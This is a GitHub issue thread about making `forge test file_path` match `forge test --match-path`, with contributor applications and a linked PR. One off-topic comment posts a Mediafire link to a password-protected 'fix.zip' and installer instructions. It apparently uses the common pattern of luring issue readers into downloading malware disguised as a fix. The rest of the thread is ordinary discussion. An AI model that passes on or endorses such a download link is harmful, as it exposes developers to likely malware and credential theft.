### ISSUE TITLE
make `forge test file_path` the same as `forge test --match-path file_path`

### ISSUE THREAD

**Issue by zhiqiangxu** [foundry-rs/foundry#8742]
### Component

Forge

### Describe the feature you would like

Now that `forge script file_path` works, there seems to be no good reason why `forge test file_path`  doesn't work. It should behave the same as `forge test --match-path file_path`.

**Comment by zerosnacks** [comment]
Hi @zhiqiangxu thanks for your suggestion, I tend to agree this would be beneficial. Is this something you would like to work on?

**Comment by ScottyDavies** [comment]
I am applying to this issue via [OnlyDust platform](https://app.onlydust.com/p/foundry).

### My background and how it can be leveraged
I am  front developer with years of experience, this will be my first time contributing on this ecosystem 

### How I plan on tackling this issue
I would approach this issue with following steps

I understand the existing Forge codebase, particularly the test command implementation.
I will analyze how the forge test command currently handles file paths and matching.
Design the new forge test file_path functionality:
Parse the command-line arguments to recognize the file path.
Modify the test discovery and execution logic to handle the specified file path.
Ensure consistency with the existing forge test --match-path behavior.
Implement the changes, update relevant tests, and ensure overall functionality remains stable.
Thoroughly test the new functionality and validate the expected outcomes.
Update the Forge documentation to reflect the new feature.
Submit a pull request to the Forge project, providing a detailed description and addressing any feedback.
Engage with the Forge community throughout the review and discussion process.

**Comment by ShantelPeters** [comment]
I am applying to this issue via [OnlyDust platform](https://app.onlydust.com/p/foundry).

### My background and how it can be leveraged
Hi please i will love to be given the opportunity to contribute to this rep,i am a blockchain developer html ,css ,react javascript typescript ,python 

### How I plan on tackling this issue
To solve this problem i would implement the following : 

1. **Align Functionality**: Modify the `forge test` command to accept a direct file path, making it function similarly to `forge test --match-path file_path`.

2. **Implement File Path Handling**: Update the command to recognize and process the provided file path, ensuring it runs tests only within that specified file.

3. **Consistency Check**: Ensure that the behavior of `forge test file_path` is consistent with `forge script file_path` to provide a unified experience.
i will come up with a PR within 3-5 working days once i am assigned . please assign this issue to me i am ready to work

**Comment by 2302114245** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by jsanchez556** [comment]
I am applying to this issue via [OnlyDust platform](https://app.onlydust.com/p/foundry).

### My background and how it can be leveraged
Hello, I’m Jose Mario from Costa Rica. With over 15 years of full stack development experience, I am passionate about contributing to open-source projects. Currently, I’m expanding my expertise in Rust, Cairo, and Solidity, having recently made my first contribution using Rust. I am also actively involved with Dojo Coding.


### How I plan on tackling this issue
Debug the TestArgs struct implementation to understand how the forge test --match-path file_path command works, and replicate that behavior for forge test file_path.

**Comment by zhiqiangxu** [comment]
> Hi @zhiqiangxu thanks for your suggestion, I tend to agree this would be beneficial. Is this something you would like to work on?

@zerosnacks I just created a PR [here](https://github.com/foundry-rs/foundry/pull/8751), pls take a look:)
